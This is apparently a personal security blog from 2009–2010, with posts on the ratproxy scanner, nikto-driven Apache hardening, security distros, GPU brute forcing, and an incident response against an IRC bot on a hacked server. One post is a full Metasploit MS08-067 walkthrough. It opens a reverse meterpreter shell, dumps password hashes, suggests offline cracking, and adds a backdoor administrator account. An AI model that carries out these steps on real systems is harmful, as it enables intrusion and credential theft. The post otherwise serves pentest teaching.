Wednesday, February 3, 2010

ratproxy - web application vulnerability scanner (XSS and more)


Ratproxy is a tool for finding vulnerabilities in web applications. Its author is Michal Zalewski (lcamtuf), the well-known Polish security researcher who also wrote p0f.

Ratproxy works as a proxy sitting between your browser and the server. It records every request and response passing through it in both directions and analyses them for problems as you browse the site (passively by default; the -X flag adds active, disruptive tests). See below:

browser --- ratproxy --- server

Requirement:
To make life easier, get BackTrack 4 (BT4) and boot the live CD; ratproxy is already on it.

login = root, password = toor


Change directory to /pentest/web/ratproxy:
root@bt:/#cd /pentest/web/ratproxy

Make a directory for the trace files ratproxy will write later:
root@bt:/pentest/web/ratproxy# mkdir /root/ratproxy

Then run ratproxy:
root@bt:/pentest/web/ratproxy# ./ratproxy -v /root/ratproxy/ -w e.log -d xxxxx.com.my -XCl2efxiscmg -p 8080
ratproxy version 1.58-beta by lcamtuf@google.com
Proxy configured successfully. Have fun, and please do not be evil.
WARNING: Disruptive tests enabled. use with care.
[+] Accepting connections on port 8080/tcp (local only)...

Simple explanation:
-v the directory where the trace files are stored
-w the log file for this session (the report is generated from it later)
-d xxxx.com.my is my domain name; ratproxy only analyses traffic to this domain, so other sites the browser happens to visit are left alone
-p 8080 is the proxy port
-X enables the disruptive (active) tests, which is what the WARNING line refers to; only use it against a site you are authorised to test, never against a production system you cannot afford to break

For the other parameters please refer to http://code.google.com/p/ratproxy/wiki/RatproxyDoc,
as the list is a bit long.



Then set up the browser to point at the proxy. Because I am testing on my own box, localhost port 8080 will do.




Go to the website and log in.
After logging in you have to visit every single page of the site, because ratproxy can only analyse traffic that actually passes through it.
For this example I visited only a few pages.


root@bt:/pentest/web/ratproxy# ./ratproxy -v /root/ratproxy/ -w e.log -d e-market.com.my -XCl2efxiscmg -p 8080
ratproxy version 1.58-beta by lcamtuf@google.com
Proxy configured successfully. Have fun, and please do not be evil.
WARNING: Disruptive tests enabled. use with care.
[+] Accepting connections on port 8080/tcp (local only)...
^C
Back in this console, press CTRL+C to stop ratproxy once you have finished visiting all the pages.



Generate the HTML report:
root@bt:/pentest/web/ratproxy# ./ratproxy-report.sh e.log > ratproxy_report.html
root@bt:/pentest/web/ratproxy# ls -lah ratproxy_report.html
-rw-r--r-- 1 root root 61K Jan 14 14:41 ratproxy_report.html




Then open the HTML report in the browser.
See the screenshot: the findings are grouped into a few severity levels.
You can click VIEW TRACE to see the whole request/response exchange behind a finding,
and EDIT to edit the values.



Look at the result of VIEW TRACE: you can see the full transaction from the user's browser to the server.


How is this tool? Cool, right?
It is used by Google as well.
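The whole session above (make the trace directory, start the proxy scoped to one domain, stop it with CTRL+C, generate the report) as one script. This is an added example, not code from the original post or from the ratproxy project; it assumes the BT4 paths used above (/pentest/web/ratproxy) and passes the flag string through unchanged. The one thing it adds is a guard: the disruptive tests (-X) are refused unless the scan is scoped with -d, because without -d ratproxy analyses everything the browser fetches through it, including third-party sites you are not authorised to test.

```shell
#!/usr/bin/env bash
# Added example (not from the original post, not part of ratproxy): wraps the
# ratproxy session described above. Assumes the BT4 layout used in the post:
# ratproxy and ratproxy-report.sh live in /pentest/web/ratproxy.
RATPROXY_DIR="${RATPROXY_DIR:-/pentest/web/ratproxy}"

# ratproxy_args DOMAIN TRACEDIR LOGFILE PORT FLAGS
# Prints the argument list for ratproxy. -d restricts analysis and testing to
# DOMAIN. The disruptive tests (-X, the "WARNING: Disruptive tests enabled"
# line in the post) must not run unscoped, so -X without a domain is refused.
ratproxy_args() {
  local domain="$1" tracedir="$2" logfile="$3" port="$4" flags="$5"
  case "$flags" in
    *X*)
      if [ -z "$domain" ]; then
        echo "refusing disruptive mode (-X) without a -d domain scope" >&2
        return 1
      fi ;;
  esac
  printf -- '-v %s -w %s -p %s' "$tracedir" "$logfile" "$port"
  if [ -n "$domain" ]; then printf -- ' -d %s' "$domain"; fi
  printf -- ' %s\n' "$flags"
}

# ratproxy_session DOMAIN TRACEDIR LOGFILE PORT FLAGS REPORT
# Runs the proxy, waits for CTRL+C, then writes the HTML report. LOGFILE and
# REPORT are relative to RATPROXY_DIR, exactly as in the post.
ratproxy_session() {
  local args
  args="$(ratproxy_args "$1" "$2" "$3" "$4" "$5")" || return 1
  mkdir -p "$2" || return 1
  cd "$RATPROXY_DIR" || return 1
  trap ':' INT                    # CTRL+C ends ratproxy, not this script
  # shellcheck disable=SC2086     # $args is meant to be word-split
  ./ratproxy $args
  trap - INT
  ./ratproxy-report.sh "$3" > "$6" && echo "report written to $RATPROXY_DIR/$6"
}

# Usage, matching the run in the post:
#   ratproxy_session e-market.com.my /root/ratproxy/ e.log 8080 -XCl2efxiscmg ratproxy_report.html
```

The flag string is taken as given; the meaning of each letter beyond -X is in the RatproxyDoc page linked above.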

Tuesday, February 2, 2010

metasploit [ms08_067] - conficker

Still remember Conficker? What is the damage to your company when that thing spreads?

MS08-067 is the Microsoft bulletin that patches the Server service vulnerability (CVE-2008-4250) Conficker uses to spread.
Here I am going to attack a machine that has not applied MS08-067, using Metasploit.

requirement:-

system = Ubuntu 9.10

apps = Metasploit

(I won't show how to install Metasploit on Ubuntu; as a system admin you can figure that out yourself.)


To start msfconsole (the path depends on where you installed Metasploit; /opt/metasploit here):

# /opt/metasploit/msfconsole

then select the exploit module and set its options:

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.19
RHOST => 192.168.1.19
note: RHOST is the remote host, meaning your victim

msf exploit(ms08_067_netapi) > set LHOST 192.168.1.17
LHOST => 192.168.1.17
note: LHOST is the local host, the box you are running msf on

msf exploit(ms08_067_netapi) > set LPORT 4444
LPORT => 4444
note: LPORT is the local port the payload will connect back to; we use 4444 as an example

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp
note: the payload is what runs on the victim once the exploit succeeds. reverse_tcp makes the victim connect out to LHOST:LPORT rather than waiting for an inbound connection, which host firewalls rarely block

msf exploit(ms08_067_netapi) > exploit
note: launch the exploit against the victim


    [*] Started reverse handler on port 4444
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP Service Pack 2 - lang:English
    [*] Selected Target: Windows XP SP2 English (NX)
    [*] Triggering the vulnerability...
    [*] Sending stage (725504 bytes)
    [*] Meterpreter session 1 opened (192.168.1.17:4444 -> 192.168.1.19:1442)
    note: see the last line? A session has been opened between your box and the victim's box

    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    note: getuid shows which user the session runs as. NT AUTHORITY\SYSTEM is the highest privilege on the box, because that is what the exploited Server service runs as

    meterpreter > run hashdump

    [*] Obtaining the boot key...
    [*] Calculating the hboot key using SYSKEY bb35d43e0a531b188967bb43ce0f4823...
    [*] Obtaining the user list and keys...
    [*] Decrypting user keys...
    [*] Dumping password hashes...

    Administrator:500:281b94b1e665a2b2aad3b435b51404ee:361db25d1614b529c719205dfc0d7420:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    HelpAssistant:1000:5416885c50a87bdd115df056849a0a33:62a470b79584552188d83ce96f2482b2:::
    SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:aff70073db96549d5ecceb973af24bcc:::
    chenghui:1003:08fd436b7baa45341b4d308d3f102048:f7cabbe13fd7b71848064cbb40c5c13e:::
    ASPNET:1004:7bb95a870045309f8d5f5b133fbbefd5:38982698a41a6030a410d68d50428bf3:::
    admin:1011:08fd436b7baa45341b4d308d3f102048:f7cabbe13fd7b71848064cbb40c5c13e:::
    __vmware_user__:1013:c9d38fa38122a3212d28a90ef0e5c0c5:3f06c5556c2f5aaeeb4cb499ab9681e7:::

    note: run hashdump dumps every local account's password hashes in pwdump format (user:RID:LM hash:NT hash:::).
    If you do not want to add a new account to this host, think about cracking the hashes offline instead.
    tip: Cain & Abel

    meterpreter > shell
    Process 4288 created.
    Channel 2 created.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    note: the shell command gives a command prompt on the victim. I own the shell, hehe

    C:\WINDOWS\system32>ipconfig
    ipconfig

    Windows IP Configuration

    Ethernet adapter VMware Network Adapter VMnet8:

    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 192.168.81.1
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . :

    Ethernet adapter VMware Network Adapter VMnet1:

    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 192.168.136.1
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . :

    Ethernet adapter Wireless Network Connection:

    Media State . . . . . . . . . . . : Media disconnected

    Ethernet adapter VirtualBox Host-Only Network:

    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 192.168.56.1
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . :

    Ethernet adapter Local Area Connection:

    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 192.168.1.19
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : 192.168.1.1
    note: ipconfig works.


    C:\WINDOWS\system32>net user a13x P@ssw0rd /add
    net user a13x P@ssw0rd /add
    The command completed successfully.
    note: I add a user. ^^ Please practice the Windows commands.

    C:\WINDOWS\system32>net localgroup Administrators a13x /add
    net localgroup Administrators a13x /add
    The command completed successfully.
    note: I add myself to the Administrators group. Damn evil.

    You can play with this host using Windows commands like net view, net use, tasklist, taskkill, net start and so on.
    Please practice more with the Windows command line.

    The victim is my laptop, running Windows XP SP2 with the Windows firewall on and McAfee disabled.

    ENJOY HACKING, but please do not harm other people: that is computer misuse and you can be sent to jail!!

    Monday, January 4, 2010

    how secure is your apache server???

    [root@manutd nikto-2.1.0]# ./nikto.pl -C all -host 192.168.1.15
    - Nikto v2.1.0/2.1.0
    ---------------------------------------------------------------------------
    + Target IP: 192.168.1.15
    + Target Hostname: 192.168.1.15
    + Target Port: 80
    + Start Time: 2009-11-23 0:02:00
    ---------------------------------------------------------------------------
    + Server: Apache/2.2.13 (Fedora)
    + OSVDB-0: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
    + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
    + OSVDB-0: Apache/2.2.13 appears to be outdated (current is at least Apache/2.2.14). Apache 1.3.41 and 2.0.63 are also current.
    + OSVDB-3268: /icons/: Directory indexing is enabled: /icons
    + OSVDB-3233: /icons/README: Apache default file found.
    + 3582 items checked: 5 item(s) reported on remote host
    + End Time: 2009-11-23 0:02:00 (18 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested



    ========== after mod_security installed (the Server header is now a fake banner) ===========================
    [root@manutd nikto-2.1.0]# ./nikto.pl -C all -host 192.168.1.15
    - Nikto v2.1.0/2.1.0
    ---------------------------------------------------------------------------
    + Target IP: 192.168.1.15
    + Target Hostname: 192.168.1.15
    + Target Port: 80
    + Start Time: 2009-11-23 0:08:00
    ---------------------------------------------------------------------------
    + Server: Apache/2.2.0 (Fedora)
    + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
    + OSVDB-0: Apache/2.2.0 appears to be outdated (current is at least Apache/2.2.14). Apache 1.3.41 and 2.0.63 are also current.
    + 3582 items checked: 2 item(s) reported on remote host
    + End Time: 2009-11-23 0:09:00 (55 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested



    ======== after apache config tuned ===============
    [root@manutd nikto-2.1.0]# ./nikto.pl -C all -host 192.168.1.15
    - Nikto v2.1.0/2.1.0
    ---------------------------------------------------------------------------
    + Target IP: 192.168.1.15
    + Target Hostname: 192.168.1.15
    + Target Port: 80
    + Start Time: 2009-11-23 0:22:00
    ---------------------------------------------------------------------------
    + Server: Apache
    + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
    + 3582 items checked: 1 item(s) reported on remote host
    + End Time: 2009-11-23 0:23:00 (57 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested



    ========== last modification =============
    [root@devil nikto-2.1.0]# ./nikto.pl -C all -host 192.168.1.15

    - Nikto v2.1.0/2.1.0
    ---------------------------------------------------------------------------
    + Target IP: 192.168.1.15
    + Target Hostname: 192.168.1.15
    + Target Port: 80
    + Start Time: 2009-11-23 0:57:00
    ---------------------------------------------------------------------------
    + Server: This is Windows IIS 10. Enjoy hacking
    + 3582 items checked: 0 item(s) reported on remote host
    + End Time: 2009-11-23 0:58:00 (45 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested



    See, Windows IIS 10, enjoy hacking :P

    Intruders can't tell my server platform from the banner any more, but they can still fetch my pages.
    They may still guess the platform from the responses themselves (header order, error pages, default content), so a fake banner only removes the easy win.


    See, nothing to be found.... I only did a basic modification in Apache and mod_security.
    For more advanced mod_security topics, please read the two books below. They are very useful for Apache:
    Apache Security by Ivan Ristic
    The Definitive Guide to Apache mod_rewrite by Rich Bowen


    Actually I have to do more advanced web vulnerability testing, because testing with one tool is not enough. It is dangerous if a production server's pentest is done with only one tool.


    Hopefully I will get time to do more advanced pentests with various open source web scanners and proprietary products like Nessus.
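The post does not show the Apache and mod_security changes behind the three later nikto runs. Below is an added example, not the author's configuration: a small lint for httpd.conf that maps each nikto finding above to the directive responsible, run against two constructed configs, a stock-Fedora-style one that would produce the first run and a hardened one that would produce the last. The directives are ServerTokens and ServerSignature for the version in the banner, TraceEnable for OSVDB-877, Options Indexes for OSVDB-3268, the /icons/ Alias for OSVDB-3233, and mod_security's SecServerSignature for the fake banner. One caveat is built in: SecServerSignature only takes effect with ServerTokens Full, because mod_security overwrites the banner Apache emits rather than adding to it.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): lint an httpd.conf for the
# settings behind the nikto findings above. The two sample configs are
# constructed, not the post's real server configuration.
LC_ALL=C; export LC_ALL

# apache_conf_lint FILE  -- prints one finding per line, nothing when clean.
# Directive names are matched case-insensitively; absent directives are judged
# at their Apache 2.2 defaults (ServerTokens Full, ServerSignature Off,
# TraceEnable On, Options All which includes Indexes).
apache_conf_lint() {
  awk '
    { sub(/#.*/, "") }                                     # drop comments
    tolower($1) == "servertokens"       { tokens = $2 }
    tolower($1) == "serversignature"    { sig = $2 }
    tolower($1) == "traceenable"        { trace = $2 }
    tolower($1) == "secserversignature" { secsig = 1 }
    tolower($1) == "alias" && $2 == "/icons/" { icons = 1 }
    tolower($1) == "options" {
      for (i = 2; i <= NF; i++)
        if ($i == "Indexes" || $i == "+Indexes" || $i == "All") indexes = 1
    }
    END {
      if (tokens == "") tokens = "Full"
      if (sig == "")    sig = "Off"
      if (trace == "")  trace = "On"
      if (secsig) {
        # mod_security can only overwrite a banner Apache emits in full
        if (tolower(tokens) != "full")
          print "BANNER: SecServerSignature is ignored unless ServerTokens Full"
      } else if (tolower(tokens) !~ /^prod/) {
        print "BANNER: ServerTokens " tokens " puts version/OS in the Server header"
      }
      if (tolower(sig) == "on")
        print "SIGNATURE: ServerSignature On puts the version in error pages"
      if (tolower(trace) == "on")
        print "TRACE: TraceEnable On, TRACE answers (XST, nikto OSVDB-877)"
      if (indexes)
        print "INDEXES: Options Indexes lists directories (nikto OSVDB-3268)"
      if (icons)
        print "ICONS: /icons/ alias exposes Apache default files (nikto OSVDB-3233)"
    }' "$1"
}

# lint_sample weak|hardened -- lints one of two constructed configs.
lint_sample() {
  local tmp; tmp="$(mktemp)"
  if [ "$1" = weak ]; then
    cat > "$tmp" <<'EOF'
# stock-style settings that produce the first nikto run above
ServerTokens OS
ServerSignature On
<Directory "/var/www/html">
    Options Indexes FollowSymLinks
</Directory>
Alias /icons/ "/var/www/icons/"
EOF
  else
    cat > "$tmp" <<'EOF'
# hardened: ServerTokens stays Full because SecServerSignature needs it
ServerTokens Full
ServerSignature Off
TraceEnable Off
<Directory "/var/www/html">
    Options -Indexes +FollowSymLinks
</Directory>
<IfModule mod_security2.c>
    SecServerSignature "This is Windows IIS 10. Enjoy hacking"
</IfModule>
EOF
  fi
  apache_conf_lint "$tmp"
  rm -f "$tmp"
}

# Live use:  apache_conf_lint /etc/httpd/conf/httpd.conf
```

Re-run nikto after each change, as the post does; the lint tells you which directive to touch, nikto tells you whether the running server actually picked it up.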

    Pentoo, another security distro

    Pentoo, another security distro, introduced by my China friend who plays with BackTrack together with me.

    I tested it on my EEEPC 1005HA; it is very fast compared to BT4. Of course BT4 is slower because its X desktop is KDE 3.x.

    Two things really impressed me: the latest kernel, 2.6.32, and two CUDA apps. The advantage of the new kernel is that more drivers are supported and I can use EXT4, which I like very much for its better performance. And the CUDA apps really make use of the GPU's processing power; they are really good for brute forcing.

    There is a GUI thingy called Fast-Track Web Interface so that people who are not familiar with Linux have an easier time playing with these tools. This kind of GUI is also available in other security distros like NST.

    I planned to install Pentoo on my eeepc, but my China friend asked me to wait for BT4, since BT4 final will be released this month. As I see from the current development, BT4 will come with kernel 2.6.29, and my eeepc wireless card is detected automatically. I could install it from source, but that would not be so PERFECT any more.

    Well, let's see what happens with BT4 after release.

    Please see the Pentoo screenshot, which I took in VMware.


    Sunday, January 3, 2010

    1st blog of 2010 - CUDA enabled GPGPU

    This is my first blog post of 2010, after I stopped blogging for almost half a year.

    As we know, a brute force attack needs a lot of processing power to succeed.
    Nowadays a brute force attack can be done on a normal home PC, thanks to NVIDIA, whose CUDA lets the GPU do the number crunching and speeds up the calculation.

    One year ago I did not see many CUDA-based applications on the internet. With the effort of programmers, there are now CUDA apps for brute forcing available in the BackTrack 4 and Pentoo security distros.

    Recently ASUS announced a home-made supercomputer powered by CUDA GPGPUs. It is very cheap, like 200-300 USD per teraflop.

    As we can see, more and more CUDA-based applications will become available soon. It is good because the calculation speed goes up and the price comes down, but it is bad in the hands of people with an evil mindset.

    Nothing weak stays safe once CUDA is in everyday use: any short password or weak hash can be brute forced within a few minutes or less.

    Tuesday, June 9, 2009

    server compromised - finding the intruder

    Today I received a call from someone whose customer's server, which I set up almost a year ago, had been compromised.

    He asked me the favour of doing some checking.

    According to him, the intruder left 3 files in one of the web directories:
    2 are text files and the other one is an application.
    I checked the 2 text files, which are harmless, and the application is eggdrop, an IRC bot.

    Since I know it is eggdrop, I look for where the files have been installed (the pattern is quoted so the shell does not expand it in the current directory):
    [root@www ~]# find / -name 'egg*'
    /var/www/html/crew/libraries/x/conf/eggdrop.chan
    /var/www/html/crew/libraries/x/doc/html/egg-core.html
    /var/www/html/crew/libraries/x/doc/man1/eggdrop.1
    /var/www/html/crew/libraries/x/doc/eggdrop.doc
    /var/www/html/crew/libraries/x/eggdrop-1.6.6
    /var/www/html/crew/libraries/x/logs/eggdrop.log.20090608
    /var/www/html/crew/libraries/x/logs/eggdrop.log.20090606
    /var/www/html/crew/libraries/x/logs/eggdrop.log.20090607
    /var/www/html/crew/libraries/x/logs/eggdrop.log.20090609
    /usr/share/pixmaps/gnobots2/eggs.png
    /usr/lib/python2.4/site-packages/gtk-2.0/egg
    From the result I found that the bot is installed under /var/www/html/crew/libraries/x (the gnobots2 and python hits are normal system files).


    Now, see when the application was put on the server:
    [root@www ~]# ls -la /var/www/html/crew/libraries/
    -rwxr-xr-x 1 loon loon 16091 Nov 8 2008 unzip.lib.php
    -rwxr-xr-x 1 loon loon 6512 Nov 8 2008 url_generating.lib.php
    drwxr-xr-x 10 loon loon 4096 Jun 9 19:32 x
    -rw-r--r-- 1 loon loon 1868180 Jun 6 05:48 x.tar.gz
    -rwxr-xr-x 1 loon loon 6486 Nov 8 2008 zip.lib.php
    ----- --------------- more ----------------------------------------
    Note the x.tar.gz line: the tarball was dropped on Jun 6 at 05:48, while the site's own files date from Nov 8 2008. That is the hint. (The x directory shows Jun 9 because the bot keeps writing into it.)


    Now go further and look at /var/www/html/crew/libraries/x:
    [root@www x]# ls -la /var/www/html/crew/libraries/x
    total 2536
    drwxr-xr-x 10 loon loon 4096 Jun 9 19:32 .
    drwxr-xr-x 11 loon loon 4096 Jun 6 05:48 ..
    -rw-r--r-- 1 loon loon 0 Jun 9 22:23 av.db
    -rw-r--r-- 1 loon loon 71820 Jun 9 22:12 bs_data.eggdrop
    -rw-r--r-- 1 loon loon 71031 Jun 9 22:12 bs_data.eggdrop.bak
    drwxr-xr-x 2 loon loon 4096 Jun 6 05:54 conf
    -rw-r--r-- 1 loon loon 0 Aug 18 2006 cs_spam_word.conf
    drwxr-xr-x 5 loon loon 4096 Apr 5 2007 doc
    -rw-r--r-- 1 loon loon 1163288 Sep 6 2001 eggdrop-1.6.6
    drwxr-xr-x 3 loon loon 4096 Apr 5 2007 filesys
    drwxr-xr-x 4 loon loon 4096 Apr 5 2007 help
    -rw-r--r-- 1 loon loon 0 Aug 18 2006 klines
    drwxr-xr-x 2 loon loon 4096 Apr 5 2007 language
    drwxr-xr-x 2 loon loon 4096 Jun 9 00:01 logs
    -rw-r--r-- 1 loon loon 5 Jun 6 05:57 pid.eggthrone
    -rw-r--r-- 1 loon loon 465 Aug 18 2006 run
    drwxr-xr-x 2 loon loon 4096 Jun 6 05:49 scripts
    -rw-r--r-- 1 loon loon 14368 Feb 25 2004 shade
    drwxr-xr-x 2 loon loon 4096 Apr 5 2007 text
    -rwxrwxrwx 1 loon loon 1163288 Sep 6 2001 x
    -rw-r--r-- 1 loon loon 7745 Jun 6 05:49 x3
    -rwxr-xr-x 1 loon loon 21516 May 30 2007 xh
    See, most of the files are dated 6 Jun 2009 (the 2001, 2006 and 2007 dates are preserved from inside the tarball): x3, the bot's config, was written at 05:49 and pid.eggthrone at 05:57, so I believe the bot was installed and started on that day.

    The IRC bot is running as user and group loon. I talked to that user and he said he never shared his account with anyone.

    Let's see whether anyone is inside the server right now:
    [root@www x]# w
    20:03:13 up 167 days, 43 min, 4 users, load average: 0.00, 0.02, 0.00
    USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
    alex pts/2 118.100.121.74 17:51 2:10m 0.04s 0.03s sshd: alex [priv]
    loon pts/3 60.52.19.122 17:54 1:06m 0.02s 0.02s -bash
    alex pts/5 118.100.125.164 19:24 35:32 0.03s 0.01s sshd: alex [priv]
    alex pts/6 118.100.125.164 19:30 0.00s 0.08s 0.01s sshd: alex [priv]
    Shit, someone is logged in as loon, and that user said he didn't log in to the server. I believe this is the intruder.

    I do a whois to see where this IP address comes from:
    [root@www x]# whois 60.52.19.122
    [Querying whois.apnic.net]
    [whois.apnic.net]
    % [whois.apnic.net node-2]
    % Whois data copyright terms http://www.apnic.net/db/dbcopyright.html

    inetnum: 60.48.0.0 - 60.54.255.255
    netname: XDSLSTREAMYX
    descr: Telekom Malaysia Berhad
    descr: Network Strategy
    descr: Wisma Telekom
    descr: Jalan Pantai Baru
    descr: 50672 Kuala Lumpur
    country: MY
    From the result, the address belongs to a TMnet (Streamyx) customer.

    Do a netstat to see what connections are open now:
    [root@www x]# netstat -an|more
    Active Internet connections (servers and established)
    Proto Recv-Q Send-Q Local Address Foreign Address State
    tcp 0 0 127.0.0.1:2208 0.0.0.0:* LISTEN
    tcp 0 0 0.0.0.0:804 0.0.0.0:* LISTEN
    tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN
    tcp 0 0 0.0.0.0:6667 0.0.0.0:* LISTEN
    tcp 0 0 0.0.0.0:44526 0.0.0.0:* LISTEN
    tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN
    tcp 0 0 0.0.0.0:10000 0.0.0.0:* LISTEN
    tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN
    tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN
    tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN
    tcp 0 0 127.0.0.1:2207 0.0.0.0:* LISTEN
    tcp 0 0 203.114.11.102:51646 194.14.236.50:6667 ESTABLISHED
    tcp 0 0 203.114.11.102:55317 202.30.50.120:43 ESTABLISHED
    tcp 0 0 :::8897 :::* LISTEN
    --------------------------- more ---------------------------------------------------
    See the line with port 6667, the IRC port: an established connection from 203.114.11.102:51646 to 194.14.236.50:6667, plus a listener on 44526 that is not one of my services.


    Now try whois on that IP:
    [root@www x]# whois 194.14.236.50
    [Querying whois.ripe.net]
    [whois.ripe.net]
    % This is the RIPE Whois query server #2.
    % The objects are in RPSL format.
    %
    % The RIPE Database is subject to Terms and Conditions.
    % See http://www.ripe.net/db/support/db-terms-conditions.pdf

    % Note: This output has been filtered.
    % To receive output for a database update, use the "-B" flag

    % Information related to '194.14.236.0 - 194.14.236.255'

    inetnum: 194.14.236.0 - 194.14.236.255
    netname: DALNET-2
    descr: DALnet unrouted servers
    remarks: ################################################
    remarks: If you get scanned by 194.14.236.50 you are NOT
    ---------------------------- more ------------------------------------------------
    It is a DALnet server.
    lol, the intruder must be Malaysian, because Malaysians really like DALnet IRC.
    I was one of them N years ago.

    Go further on port 6667:
    [root@www alex]# lsof -i tcp:6667
    COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
    x 2709 loon 6u IPv4 37479003 TCP 203.114.11.102:51646->pool.dal.net:ircd (ESTABLISHED)
    lsof is cool..
    It shows the PID is 2709 and the user is loon.
    That means the program x is executed by loon with PID 2709.

    Now use ps to see x:
    [root@www ~]# ps auxww |grep x
    root 409 0.0 0.0 0 0 ? S<>
    mysql 1006 0.0 1.0 143508 21536 ? Sl Jan08 1:14 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --socket=/var/lib/mysql/mysql.sock
    root 1565 0.0 0.0 6744 1772 ? Ss Jan08 0:14 /usr/libexec/postfix/master
    postfix 1568 0.0 0.9 24980 19952 ? S Jan08 0:47 qmgr -l -t fifo -u
    root 2308 0.0 0.0 1672 404 ? Ss 2008 0:00 klogd -x
    loon 2709 0.0 0.2 8032 4152 ? S Jun06 0:01 -bash -m x3
    root 7579 0.0 0.0 1900 376 ? Ss 2008 0:00 gpm -m /dev/input/mice -t exps2
    root 7820 0.0 0.0 1752 448 ? S 2008 0:00 /var/ossec/bin/ossec-execd
    ------------------------------------------------ more ------------------------------------------------
    The ps output shows that loon has been running PID 2709 since 6 Jun 2009. ps prints it as '-bash -m x3': the bot started with config file x3 under an argv rewritten to look like a login shell, whereas lsof, which prints the kernel's process name, shows the real program, x.


    Look at process 2709 using netstat:
    [root@www ~]# netstat -anp |grep 2709
    tcp 0 0 0.0.0.0:44526 0.0.0.0:* LISTEN 2709/-bash
    tcp 0 0 203.114.11.102:51646 194.14.236.50:6667 ESTABLISHED 2709/-bash
    udp 0 0 0.0.0.0:54629 0.0.0.0:* 2709/-bash
    It is listening on tcp port 44526 and udp port 54629 and holds the established IRC connection from local port 51646 (netstat -p takes the name '-bash' from the same rewritten argv).


    Let's see what loon is doing now:
    [root@www alex]# lsof -u loon
    COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
    x 2709 loon cwd DIR 9,3 4096 17892533 /var/www/html/crew/libraries/x
    x 2709 loon rtd DIR 9,0 4096 2 /
    x 2709 loon mem REG 9,0 11370676 /lib/libnss_files-2.5.so (path inode=11370543)
    x 2709 loon 3u IPv4 37478934 TCP *:44526 (LISTEN)
    sshd 24370 loon 3u IPv6 38236234 TCP 203.114.11.102:8897->52.60.in-addr.arpa.tm.net.my:newlixreg (ESTABLISHED)
    bash 24371 loon cwd DIR 9,3 4096 17860330 /var/www/html/www.aviocall.com/upload
    bash 24371 loon 255u CHR 136,3 5 /dev/pts/3
    It is too long; I cut most of it and left the important lines.
    Look at the sshd line properly.
    He is connected over IPv6??? Not really: sshd here listens on :::8897 (see the netstat output above), a dual-stack socket, so an IPv4 client like this tm.net.my address shows up under an IPv6 entry in lsof. He is logging in as loon over SSH, so loon's credentials are compromised.
    And what does he want with that upload directory?

    Let's see the upload directory:
    [root@www www.aviocall.com]# ls -la upload/
    total 113672
    drwxr-xr-x 6 loon loon 4096 Jun 9 23:01 .
    drwxr-xr-x 11 loon loon 4096 Jun 9 19:10 ..
    drwxr-xr-x 2 loon loon 4096 May 30 14:32 files
    drwxr-xr-x 2 loon loon 4096 May 30 14:33 images
    -rw-r--r-- 1 loon loon 111723227 Jun 9 12:56 Manual Patch 090609.exe
    -rw-r--r-- 1 loon loon 4521984 Jun 9 23:03 Manual Patch 090609.exe.1
    drwxr-xr-x 2 loon loon 4096 May 30 14:33 pdf
    drwxr-xr-x 2 loon loon 4096 Jun 4 00:41 programs
    [root@www www.aviocall.com]# date
    Tue Jun 9 23:03:54 MYT 2009
    Look at the server time and the modification time of the file: he is writing it right now.
    He is doing something. Well, I don't mind..
    I want to monitor him now.

    See what he is doing:
    top - 23:05:48 up 167 days, 3:45, 4 users, load average: 0.01, 0.00, 0.00
    Tasks: 164 total, 2 running, 162 sleeping, 0 stopped, 0 zombie
    Cpu(s): 0.1%us, 0.1%sy, 0.0%ni, 99.8%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
    Mem: 2066076k total, 1617796k used, 448280k free, 215712k buffers
    Swap: 2096376k total, 120k used, 2096256k free, 1118104k cached

    PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
    2709 loon 15 0 8032 4188 1196 S 0.0 0.2 0:01.06 x
    10053 loon 15 0 7268 1696 1376 S 0.0 0.1 0:00.09 wget
    24370 loon 15 0 9892 1664 1112 S 0.0 0.1 0:00.56 sshd
    24371 loon 15 0 4528 1416 1200 S 0.0 0.1 0:00.03 bash
    He is using wget to fetch something from somewhere.

    See what he gets with wget:
    [root@www ~]# ps -afed|grep wget
    loon 10053 24371 0 23:01 pts/3 00:00:00 wget http://bayou.asiasoft.net/CABAL/pds/Manual%20Patch%20090609.exe
    root 10371 10342 0 23:13 pts/8 00:00:00 grep wget
